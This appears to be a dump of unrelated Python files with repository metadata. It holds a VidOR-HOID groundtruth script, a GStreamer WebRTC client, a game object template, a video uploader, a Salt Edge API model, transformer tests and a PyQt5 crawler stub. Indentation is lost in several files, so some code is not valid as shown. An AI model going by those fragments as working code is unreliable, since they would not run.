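    # Illustrative sketch (not part of the original module): load only the validation
    # split in low-memory mode; the two root paths below are hypothetical placeholders.
    return VidOR_HOID('vidor-dataset/annotation', 'vidor-dataset/video',
                      ['validation'], low_memory=True)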
if __name__ == '__main__':
"""
To generate a single JSON groundtruth file for specific split and task,
run this script from current directory.
"""
import json
from argparse import ArgumentParser
parser = ArgumentParser(description='Generate a single JSON groundtruth file for VidOR-HOID')
parser.add_argument('--data_root', dest='data_root', type=str,
default='../data/vidor_hoid_mini/vidor-dataset',
help='root dir of dataset')
parser.add_argument('--split', dest='split', choices=['training', 'validation'],
default='validation',
help='which dataset split the groundtruth generated for')
parser.add_argument('--task', dest='task', choices=['obj', 'hoid', 'vrd'],
default='hoid',
help='which task the groundtruth generated for')
args = parser.parse_args()
    # to load the training set without low memory mode for faster processing, you need sufficiently large RAM
anno_root = os.path.join(args.data_root, 'annotation')
video_root = os.path.join(args.data_root, 'video')
    dataset = VidOR_HOID(anno_root, video_root, [args.split], low_memory=True)
index = dataset.get_index(args.split)
if args.split == 'training':
args.split = 'train'
elif args.split == 'validation':
args.split = 'val'
output_path = 'vidor_hoid_mini_%s_%s_gt.json' % (args.task, args.split)
print('Generating %s ...' % output_path)
gts = dict()
for ind in tqdm(index):
if args.task == 'obj':
gt = dataset.get_object_insts(ind)
elif args.task == 'vrd':
gt = dataset.get_relation_insts(ind)
elif args.task == 'hoid':
gt = dataset.get_relation_insts(ind)
gts[ind] = gt
with open(output_path, 'w') as fout:
json.dump(gts, fout, separators=(',', ':'))
| 39.714286
| 128
| 0.630804
|
81f819598f9c996976e2a3babbedc8804e434b39
| 6,716
|
py
|
Python
|
python-gstreamer-webrtc-client/gst-exp/run.py
|
raushanraja/webrtc-example
|
b6ed87a29c4c7837962ac8c849a75823f6bbe471
|
[
"Apache-2.0"
] | null | null | null |
python-gstreamer-webrtc-client/gst-exp/run.py
|
raushanraja/webrtc-example
|
b6ed87a29c4c7837962ac8c849a75823f6bbe471
|
[
"Apache-2.0"
] | null | null | null |
python-gstreamer-webrtc-client/gst-exp/run.py
|
raushanraja/webrtc-example
|
b6ed87a29c4c7837962ac8c849a75823f6bbe471
|
[
"Apache-2.0"
] | null | null | null |
import random
import ssl
import websockets
import asyncio
import os
import sys
import json
import argparse
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
gi.require_version('GstWebRTC', '1.0')
from gi.repository import GstWebRTC
gi.require_version('GstSdp', '1.0')
from gi.repository import GstSdp
PIPELINE_DESC = '''
webrtcbin name=sendrecv bundle-policy=max-bundle
v4l2src ! videoconvert ! queue ! vp8enc deadline=1 ! rtpvp8pay !
queue ! application/x-rtp,media=video,encoding-name=VP8,payload=97 ! sendrecv.
autoaudiosrc ! queue ! opusenc ! rtpopuspay !
queue ! application/x-rtp,media=audio,encoding-name=OPUS,payload=96 ! sendrecv.
'''
class WebRTCClient:
def __init__(self, id_, peer_id, server):
self.id_ = id_
self.conn = None
self.pipe = None
self.webrtc = None
self.peer_id = peer_id
self.server = server or 'wss://298799d45d27.ngrok.io'
async def connect(self):
sslctx = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.conn = await websockets.connect(self.server, ssl=sslctx)
msg = json.dumps({'type': 'ready'})
await self.conn.send(msg)
async def setup_call(self):
await self.conn.send('SESSION {}'.format(self.peer_id))
def send_sdp_offer(self, offer):
text = offer.sdp.as_text()
print ('Sending offer:\n%s' % text)
msg = json.dumps({'type': 'offer', 'data':{'sdp':{'type':'offer','sdp':text}}})
loop = asyncio.new_event_loop()
loop.run_until_complete(self.conn.send(msg))
def on_offer_created(self, promise, _, __):
promise.wait()
reply = promise.get_reply()
offer = reply.get_value('offer')
promise = Gst.Promise.new()
self.webrtc.emit('set-local-description', offer, promise)
promise.interrupt()
self.send_sdp_offer(offer)
def on_negotiation_needed(self, element):
promise = Gst.Promise.new_with_change_func(self.on_offer_created, element, None)
element.emit('create-offer', None, promise)
def send_ice_candidate_message(self, _, mlineindex, candidate):
icemsg = json.dumps({'type':'newIceCandidate', 'data':{'candidate':{'candidate':candidate,'sdpMLineIndex': mlineindex}}})
loop = asyncio.new_event_loop()
loop.run_until_complete(self.conn.send(icemsg))
def on_incoming_decodebin_stream(self, _, pad):
if not pad.has_current_caps():
print (pad, 'has no caps, ignoring')
return
caps = pad.get_current_caps()
name = caps.to_string()
if name.startswith('video'):
q = Gst.ElementFactory.make('queue')
conv = Gst.ElementFactory.make('videoconvert')
sink = Gst.ElementFactory.make('autovideosink')
self.pipe.add(q)
self.pipe.add(conv)
self.pipe.add(sink)
self.pipe.sync_children_states()
pad.link(q.get_static_pad('sink'))
q.link(conv)
conv.link(sink)
elif name.startswith('audio'):
q = Gst.ElementFactory.make('queue')
conv = Gst.ElementFactory.make('audioconvert')
resample = Gst.ElementFactory.make('audioresample')
sink = Gst.ElementFactory.make('autoaudiosink')
self.pipe.add(q)
self.pipe.add(conv)
self.pipe.add(resample)
self.pipe.add(sink)
self.pipe.sync_children_states()
pad.link(q.get_static_pad('sink'))
q.link(conv)
conv.link(resample)
resample.link(sink)
def on_incoming_stream(self, _, pad):
if pad.direction != Gst.PadDirection.SRC:
return
decodebin = Gst.ElementFactory.make('decodebin')
decodebin.connect('pad-added', self.on_incoming_decodebin_stream)
self.pipe.add(decodebin)
decodebin.sync_state_with_parent()
self.webrtc.link(decodebin)
def start_pipeline(self):
self.pipe = Gst.parse_launch(PIPELINE_DESC)
self.webrtc = self.pipe.get_by_name('sendrecv')
self.webrtc.connect('on-negotiation-needed', self.on_negotiation_needed)
self.webrtc.connect('on-ice-candidate', self.send_ice_candidate_message)
self.webrtc.connect('pad-added', self.on_incoming_stream)
self.pipe.set_state(Gst.State.PLAYING)
async def handle_sdp(self, message):
print("\n")
print(message['type'],end="\n\n")
assert (self.webrtc)
msg = message
if message['type'] == 'answer':
sdp = msg['data']['sdp']
# print(sdp)
assert(sdp['type'] == 'answer')
sdp = sdp['sdp']
# print ('Received answer:\n%s' % sdp)
res, sdpmsg = GstSdp.SDPMessage.new()
GstSdp.sdp_message_parse_buffer(bytes(sdp.encode()), sdpmsg)
answer = GstWebRTC.WebRTCSessionDescription.new(GstWebRTC.WebRTCSDPType.ANSWER, sdpmsg)
promise = Gst.Promise.new()
self.webrtc.emit('set-remote-description', answer, promise)
promise.interrupt()
elif message['type'] == 'newIceCandidate':
ice = msg['data']
candidate = ice['candidate']
print(candidate)
sdpmlineindex = candidate['sdpMLineIndex']
self.webrtc.emit('add-ice-candidate', sdpmlineindex, candidate['candidate'])
async def loop(self):
assert self.conn
async for message in self.conn:
message = json.loads(message)
print(message['type'])
if message['type'] == 'ready':
self.start_pipeline()
else:
await self.handle_sdp(message)
return 0
def check_plugins():
needed = ["opus", "vpx", "nice", "webrtc", "dtls", "srtp", "rtp",
"rtpmanager", "videotestsrc", "audiotestsrc"]
missing = list(filter(lambda p: Gst.Registry.get().find_plugin(p) is None, needed))
if len(missing):
print('Missing gstreamer plugins:', missing)
return False
return True
if __name__=='__main__':
Gst.init(None)
if not check_plugins():
sys.exit(1)
parser = argparse.ArgumentParser()
parser.add_argument('peerid', help='String ID of the peer to connect to')
parser.add_argument('--server', help='Signalling server to connect to, eg "wss://127.0.0.1:8443"')
args = parser.parse_args()
our_id = random.randrange(10, 10000)
c = WebRTCClient(our_id, args.peerid, args.server)
asyncio.get_event_loop().run_until_complete(c.connect())
res = asyncio.get_event_loop().run_until_complete(c.loop())
sys.exit(res)
| 36.901099
| 129
| 0.625968
|
be53589ba3eba1da3b9f895fd6ecfd64fd76a9da
| 451
|
py
|
Python
|
data/scripts/templates/object/tangible/lair/bol/shared_lair_bol_grassland.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/tangible/lair/bol/shared_lair_bol_grassland.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/tangible/lair/bol/shared_lair_bol_grassland.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/lair/bol/shared_lair_bol_grassland.iff"
result.attribute_template_id = -1
result.stfName("lair_n","bol_grassland")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 26.529412
| 75
| 0.727273
|
8753534109c83b44dc8f21c9d0d2f0932f760144
| 1,780
|
py
|
Python
|
biliup/engine/upload.py
|
DingKuiqing/bilibiliupload
|
7fa66ece796859219b2119edfc7e6838fd7c4bfa
|
[
"MIT"
] | 1
|
2021-08-15T07:27:57.000Z
|
2021-08-15T07:27:57.000Z
|
biliup/engine/upload.py
|
yzydlc/bilibiliupload
|
89428db415f55c63d6431f320ed3c83c3481448f
|
[
"MIT"
] | null | null | null |
biliup/engine/upload.py
|
yzydlc/bilibiliupload
|
89428db415f55c63d6431f320ed3c83c3481448f
|
[
"MIT"
] | null | null | null |
import logging
import os
logger = logging.getLogger('biliup')
class UploadBase:
def __init__(self, principal, data, persistence_path=None):
self.principal = principal
self.persistence_path = persistence_path
self.data = data
# @property
@staticmethod
def file_list(index):
file_list = []
for file_name in os.listdir('.'):
if index in file_name:
file_list.append(file_name)
file_list = sorted(file_list)
return file_list
@staticmethod
def remove_filelist(file_list):
for r in file_list:
os.remove(r)
            logger.info('Deleted ' + r)
@staticmethod
def filter_file(index):
file_list = UploadBase.file_list(index)
if len(file_list) == 0:
return False
for r in file_list:
file_size = os.path.getsize(r) / 1024 / 1024 / 1024
if file_size <= 0.02:
os.remove(r)
                logger.info('Filtered out and deleted ' + r)
file_list = UploadBase.file_list(index)
if len(file_list) == 0:
            logger.info('No files left to upload after filtering')
return False
for f in file_list:
if f.endswith('.part'):
os.rename(f, os.path.splitext(f)[0])
                logger.info('%s exists, renamed' % f)
return True
def upload(self, file_list):
raise NotImplementedError()
def start(self):
if self.filter_file(self.principal):
            logger.info('Preparing to upload ' + self.data["format_title"])
needed2process = self.upload(UploadBase.file_list(self.principal))
self.postprocessor(needed2process)
def postprocessor(self, data):
# data = file_list
if data:
self.remove_filelist(data)
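class _ExampleUpload(UploadBase):
    # Illustrative subclass sketch (not part of the original module): a concrete uploader
    # only needs to implement upload() and return the files that were fully handled, so
    # that postprocessor() can delete them afterwards.
    def upload(self, file_list):
        for f in file_list:
            logger.info('would upload %s for %s', f, self.data.get("format_title", self.principal))
        return file_list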
| 28.709677
| 78
| 0.574157
|
d458617b924ccd4e62e9bf591893230723efd0e6
| 13,123
|
py
|
Python
|
third_party/saltedge/swagger_client/models/report.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 1
|
2022-03-01T10:28:31.000Z
|
2022-03-01T10:28:31.000Z
|
third_party/saltedge/swagger_client/models/report.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 75
|
2020-11-07T20:14:55.000Z
|
2021-10-05T15:08:22.000Z
|
third_party/saltedge/swagger_client/models/report.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: support@saltedge.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Report(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'result': 'ReportResult',
'customer_id': 'int',
'connection_ids': 'list[str]',
'connections': 'list[ReportConnections]',
'currency_code': 'str',
'exchange_rates': 'object',
'report_id': 'int',
'report_types': 'list[str]',
'status': 'str',
'from_date': 'date',
'to_date': 'date'
}
attribute_map = {
'result': 'result',
'customer_id': 'customer_id',
'connection_ids': 'connection_ids',
'connections': 'connections',
'currency_code': 'currency_code',
'exchange_rates': 'exchange_rates',
'report_id': 'report_id',
'report_types': 'report_types',
'status': 'status',
'from_date': 'from_date',
'to_date': 'to_date'
}
def __init__(self, result=None, customer_id=None, connection_ids=None, connections=None, currency_code=None, exchange_rates=None, report_id=None, report_types=None, status=None, from_date=None, to_date=None): # noqa: E501
"""Report - a model defined in Swagger""" # noqa: E501
self._result = None
self._customer_id = None
self._connection_ids = None
self._connections = None
self._currency_code = None
self._exchange_rates = None
self._report_id = None
self._report_types = None
self._status = None
self._from_date = None
self._to_date = None
self.discriminator = None
self.result = result
self.customer_id = customer_id
self.connection_ids = connection_ids
self.connections = connections
self.currency_code = currency_code
self.exchange_rates = exchange_rates
self.report_id = report_id
self.report_types = report_types
self.status = status
self.from_date = from_date
self.to_date = to_date
@property
def result(self):
"""Gets the result of this Report. # noqa: E501
:return: The result of this Report. # noqa: E501
:rtype: ReportResult
"""
return self._result
@result.setter
def result(self, result):
"""Sets the result of this Report.
:param result: The result of this Report. # noqa: E501
:type: ReportResult
"""
if result is None:
raise ValueError("Invalid value for `result`, must not be `None`") # noqa: E501
self._result = result
@property
def customer_id(self):
"""Gets the customer_id of this Report. # noqa: E501
The `id` of the [customer](#customers) # noqa: E501
:return: The customer_id of this Report. # noqa: E501
:rtype: int
"""
return self._customer_id
@customer_id.setter
def customer_id(self, customer_id):
"""Sets the customer_id of this Report.
The `id` of the [customer](#customers) # noqa: E501
:param customer_id: The customer_id of this Report. # noqa: E501
:type: int
"""
if customer_id is None:
raise ValueError("Invalid value for `customer_id`, must not be `None`") # noqa: E501
self._customer_id = customer_id
@property
def connection_ids(self):
"""Gets the connection_ids of this Report. # noqa: E501
`ids` of [Connections](#connections) included in report # noqa: E501
:return: The connection_ids of this Report. # noqa: E501
:rtype: list[str]
"""
return self._connection_ids
@connection_ids.setter
def connection_ids(self, connection_ids):
"""Sets the connection_ids of this Report.
`ids` of [Connections](#connections) included in report # noqa: E501
:param connection_ids: The connection_ids of this Report. # noqa: E501
:type: list[str]
"""
if connection_ids is None:
raise ValueError("Invalid value for `connection_ids`, must not be `None`") # noqa: E501
self._connection_ids = connection_ids
@property
def connections(self):
"""Gets the connections of this Report. # noqa: E501
information related to connections included in report # noqa: E501
:return: The connections of this Report. # noqa: E501
:rtype: list[ReportConnections]
"""
return self._connections
@connections.setter
def connections(self, connections):
"""Sets the connections of this Report.
information related to connections included in report # noqa: E501
:param connections: The connections of this Report. # noqa: E501
:type: list[ReportConnections]
"""
if connections is None:
raise ValueError("Invalid value for `connections`, must not be `None`") # noqa: E501
self._connections = connections
@property
def currency_code(self):
"""Gets the currency_code of this Report. # noqa: E501
main [currency code](#currencies) used for report's generation and value conversion # noqa: E501
:return: The currency_code of this Report. # noqa: E501
:rtype: str
"""
return self._currency_code
@currency_code.setter
def currency_code(self, currency_code):
"""Sets the currency_code of this Report.
main [currency code](#currencies) used for report's generation and value conversion # noqa: E501
:param currency_code: The currency_code of this Report. # noqa: E501
:type: str
"""
if currency_code is None:
raise ValueError("Invalid value for `currency_code`, must not be `None`") # noqa: E501
self._currency_code = currency_code
@property
def exchange_rates(self):
"""Gets the exchange_rates of this Report. # noqa: E501
a list of exchange rates at the time of report creation # noqa: E501
:return: The exchange_rates of this Report. # noqa: E501
:rtype: object
"""
return self._exchange_rates
@exchange_rates.setter
def exchange_rates(self, exchange_rates):
"""Sets the exchange_rates of this Report.
a list of exchange rates at the time of report creation # noqa: E501
:param exchange_rates: The exchange_rates of this Report. # noqa: E501
:type: object
"""
if exchange_rates is None:
raise ValueError("Invalid value for `exchange_rates`, must not be `None`") # noqa: E501
self._exchange_rates = exchange_rates
@property
def report_id(self):
"""Gets the report_id of this Report. # noqa: E501
the `id` of the generated report # noqa: E501
:return: The report_id of this Report. # noqa: E501
:rtype: int
"""
return self._report_id
@report_id.setter
def report_id(self, report_id):
"""Sets the report_id of this Report.
the `id` of the generated report # noqa: E501
:param report_id: The report_id of this Report. # noqa: E501
:type: int
"""
if report_id is None:
raise ValueError("Invalid value for `report_id`, must not be `None`") # noqa: E501
self._report_id = report_id
@property
def report_types(self):
"""Gets the report_types of this Report. # noqa: E501
types of generated reports. # noqa: E501
:return: The report_types of this Report. # noqa: E501
:rtype: list[str]
"""
return self._report_types
@report_types.setter
def report_types(self, report_types):
"""Sets the report_types of this Report.
types of generated reports. # noqa: E501
:param report_types: The report_types of this Report. # noqa: E501
:type: list[str]
"""
if report_types is None:
raise ValueError("Invalid value for `report_types`, must not be `None`") # noqa: E501
allowed_values = ["balance", "expense", "income", "savings"] # noqa: E501
if not set(report_types).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `report_types` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(report_types) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._report_types = report_types
@property
def status(self):
"""Gets the status of this Report. # noqa: E501
current report's status. # noqa: E501
:return: The status of this Report. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Report.
current report's status. # noqa: E501
:param status: The status of this Report. # noqa: E501
:type: str
"""
if status is None:
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
allowed_values = ["initialized", "calculating", "success", "failed"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def from_date(self):
"""Gets the from_date of this Report. # noqa: E501
the date from which the data in the report are included # noqa: E501
:return: The from_date of this Report. # noqa: E501
:rtype: date
"""
return self._from_date
@from_date.setter
def from_date(self, from_date):
"""Sets the from_date of this Report.
the date from which the data in the report are included # noqa: E501
:param from_date: The from_date of this Report. # noqa: E501
:type: date
"""
if from_date is None:
raise ValueError("Invalid value for `from_date`, must not be `None`") # noqa: E501
self._from_date = from_date
@property
def to_date(self):
"""Gets the to_date of this Report. # noqa: E501
the date to which the data in the report are included # noqa: E501
:return: The to_date of this Report. # noqa: E501
:rtype: date
"""
return self._to_date
@to_date.setter
def to_date(self, to_date):
"""Sets the to_date of this Report.
the date to which the data in the report are included # noqa: E501
:param to_date: The to_date of this Report. # noqa: E501
:type: date
"""
if to_date is None:
raise ValueError("Invalid value for `to_date`, must not be `None`") # noqa: E501
self._to_date = to_date
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Report, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Report):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.621687
| 226
| 0.592243
|
8d8c21835a9c4da45bdec445ad5ccfd3e8eace76
| 10,826
|
py
|
Python
|
tests/test_modeling_tf_openai.py
|
christy-yuan-li/transformers-1
|
2ee9f9b69e67426aaed690f652f9cdd8b524b99d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_modeling_tf_openai.py
|
christy-yuan-li/transformers-1
|
2ee9f9b69e67426aaed690f652f9cdd8b524b99d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_modeling_tf_openai.py
|
christy-yuan-li/transformers-1
|
2ee9f9b69e67426aaed690f652f9cdd8b524b99d
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import OpenAIGPTConfig, is_tf_available
from transformers.testing_utils import require_tf, slow
from .test_configuration_common import ConfigTester
from .test_modeling_tf_common import TFModelTesterMixin, ids_tensor
if is_tf_available():
import tensorflow as tf
from transformers.models.openai.modeling_tf_openai import (
TF_OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST,
TFOpenAIGPTDoubleHeadsModel,
TFOpenAIGPTForSequenceClassification,
TFOpenAIGPTLMHeadModel,
TFOpenAIGPTModel,
)
class TFOpenAIGPTModelTester:
def __init__(
self,
parent,
):
self.parent = parent
self.batch_size = 13
self.seq_length = 7
self.is_training = True
self.use_token_type_ids = True
self.use_input_mask = True
self.use_labels = True
self.use_mc_token_ids = True
self.vocab_size = 99
self.hidden_size = 32
self.num_hidden_layers = 5
self.num_attention_heads = 4
self.intermediate_size = 37
self.hidden_act = "gelu"
self.hidden_dropout_prob = 0.1
self.attention_probs_dropout_prob = 0.1
self.max_position_embeddings = 512
self.type_vocab_size = 16
self.type_sequence_label_size = 2
self.initializer_range = 0.02
self.num_labels = 3
self.num_choices = 4
self.scope = None
self.pad_token_id = self.vocab_size - 1
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = ids_tensor([self.batch_size, self.seq_length], vocab_size=2)
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
mc_token_ids = None
if self.use_mc_token_ids:
mc_token_ids = ids_tensor([self.batch_size, self.num_choices], self.seq_length)
sequence_labels = None
token_labels = None
choice_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
choice_labels = ids_tensor([self.batch_size], self.num_choices)
config = OpenAIGPTConfig(
vocab_size=self.vocab_size,
n_embd=self.hidden_size,
n_layer=self.num_hidden_layers,
n_head=self.num_attention_heads,
# intermediate_size=self.intermediate_size,
# hidden_act=self.hidden_act,
# hidden_dropout_prob=self.hidden_dropout_prob,
# attention_probs_dropout_prob=self.attention_probs_dropout_prob,
n_positions=self.max_position_embeddings,
n_ctx=self.max_position_embeddings,
# type_vocab_size=self.type_vocab_size,
# initializer_range=self.initializer_range,
pad_token_id=self.pad_token_id,
)
head_mask = ids_tensor([self.num_hidden_layers, self.num_attention_heads], 2)
return (
config,
input_ids,
input_mask,
head_mask,
token_type_ids,
mc_token_ids,
sequence_labels,
token_labels,
choice_labels,
)
def create_and_check_openai_gpt_model(self, config, input_ids, input_mask, head_mask, token_type_ids, *args):
model = TFOpenAIGPTModel(config=config)
inputs = {"input_ids": input_ids, "attention_mask": input_mask, "token_type_ids": token_type_ids}
result = model(inputs)
inputs = [input_ids, input_mask]
result = model(inputs)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
def create_and_check_openai_gpt_lm_head(self, config, input_ids, input_mask, head_mask, token_type_ids, *args):
model = TFOpenAIGPTLMHeadModel(config=config)
inputs = {"input_ids": input_ids, "attention_mask": input_mask, "token_type_ids": token_type_ids}
result = model(inputs)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_openai_gpt_double_head(
self, config, input_ids, input_mask, head_mask, token_type_ids, mc_token_ids, *args
):
model = TFOpenAIGPTDoubleHeadsModel(config=config)
multiple_choice_inputs_ids = tf.tile(tf.expand_dims(input_ids, 1), (1, self.num_choices, 1))
multiple_choice_input_mask = tf.tile(tf.expand_dims(input_mask, 1), (1, self.num_choices, 1))
multiple_choice_token_type_ids = tf.tile(tf.expand_dims(token_type_ids, 1), (1, self.num_choices, 1))
inputs = {
"input_ids": multiple_choice_inputs_ids,
"mc_token_ids": mc_token_ids,
"attention_mask": multiple_choice_input_mask,
"token_type_ids": multiple_choice_token_type_ids,
}
result = model(inputs)
self.parent.assertEqual(
result.logits.shape, (self.batch_size, self.num_choices, self.seq_length, self.vocab_size)
)
self.parent.assertEqual(result.mc_logits.shape, (self.batch_size, self.num_choices))
def create_and_check_openai_gpt_for_sequence_classification(
self, config, input_ids, input_mask, head_mask, token_type_ids, *args
):
config.num_labels = self.num_labels
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
inputs = {
"input_ids": input_ids,
"attention_mask": input_mask,
"token_type_ids": token_type_ids,
"labels": sequence_labels,
}
model = TFOpenAIGPTForSequenceClassification(config)
result = model(inputs)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
input_mask,
head_mask,
token_type_ids,
mc_token_ids,
sequence_labels,
token_labels,
choice_labels,
) = config_and_inputs
inputs_dict = {"input_ids": input_ids, "token_type_ids": token_type_ids, "attention_mask": input_mask}
return config, inputs_dict
@require_tf
class TFOpenAIGPTModelTest(TFModelTesterMixin, unittest.TestCase):
all_model_classes = (
(TFOpenAIGPTModel, TFOpenAIGPTLMHeadModel, TFOpenAIGPTDoubleHeadsModel, TFOpenAIGPTForSequenceClassification)
if is_tf_available()
else ()
)
all_generative_model_classes = (
(TFOpenAIGPTLMHeadModel,) if is_tf_available() else ()
) # TODO (PVP): Add Double HeadsModel when generate() function is changed accordingly
test_head_masking = False
def setUp(self):
self.model_tester = TFOpenAIGPTModelTester(self)
self.config_tester = ConfigTester(self, config_class=OpenAIGPTConfig, n_embd=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_openai_gpt_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_model(*config_and_inputs)
def test_openai_gpt_lm_head(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_lm_head(*config_and_inputs)
def test_openai_gpt_double_head(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_double_head(*config_and_inputs)
def test_model_common_attributes(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
model = model_class(config)
assert isinstance(model.get_input_embeddings(), tf.keras.layers.Layer)
if model_class in self.all_generative_model_classes:
x = model.get_output_embeddings()
assert isinstance(x, tf.keras.layers.Layer)
name = model.get_bias()
assert name is None
else:
x = model.get_output_embeddings()
assert x is None
name = model.get_bias()
assert name is None
def test_openai_gpt_sequence_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_for_sequence_classification(*config_and_inputs)
def test_mixed_precision(self):
# TODO JP: Make OpenAIGPT float16 compliant
pass
@slow
def test_model_from_pretrained(self):
for model_name in TF_OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
model = TFOpenAIGPTModel.from_pretrained(model_name)
self.assertIsNotNone(model)
@require_tf
class TFOPENAIGPTModelLanguageGenerationTest(unittest.TestCase):
@slow
def test_lm_generate_openai_gpt(self):
model = TFOpenAIGPTLMHeadModel.from_pretrained("openai-gpt")
input_ids = tf.convert_to_tensor([[481, 4735, 544]], dtype=tf.int32) # the president is
expected_output_ids = [
481,
4735,
544,
246,
963,
870,
762,
239,
244,
40477,
244,
249,
719,
881,
487,
544,
240,
244,
603,
481,
] # the president is a very good man. " \n " i\'m sure he is, " said the
output_ids = model.generate(input_ids, do_sample=False)
self.assertListEqual(output_ids[0].numpy().tolist(), expected_output_ids)
| 37.331034
| 117
| 0.669315
|
3515e554c0e1de4d081f0f0894607b26c1ada925
| 6,434
|
py
|
Python
|
crawer.py
|
code-aifarmer/Image-crawling-program-developed-based-on-PyQt5
|
6a897f958f3b82fbcf124722098110d59f76c608
|
[
"MIT"
] | 2
|
2021-01-20T16:30:25.000Z
|
2021-05-20T15:09:22.000Z
|
crawer.py
|
code-aifarmer/Image-crawling-program-developed-based-on-PyQt5
|
6a897f958f3b82fbcf124722098110d59f76c608
|
[
"MIT"
] | null | null | null |
crawer.py
|
code-aifarmer/Image-crawling-program-developed-based-on-PyQt5
|
6a897f958f3b82fbcf124722098110d59f76c608
|
[
"MIT"
] | 2
|
2021-01-22T04:21:07.000Z
|
2021-05-20T15:09:26.000Z
|
# -*- coding: utf-8 -*-
from ui_mainwindow import Ui_MainWindow
import utils
from PyQt5.Qt import *
from PyQt5.QtTest import QTest
from threading import Thread
import shlex
import os
from tkinter import messagebox
import image_downloader
from logger import logger
# class DialogAbout(QDialog, Ui_Dialog_about):
# def __init__(self):
# QDialog.__init__(self)
# self.setupUi(self)
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
logger.log_hooks.append(self.log)
self.log_queue = []
QMainWindow.__init__(self)
self.setupUi(self)
# self.dialog_about = DialogAbout()
self.state = "stop"
self.elapsed_timer = QElapsedTimer()
self.update_timer = QTimer()
self.update_timer.setInterval(100)
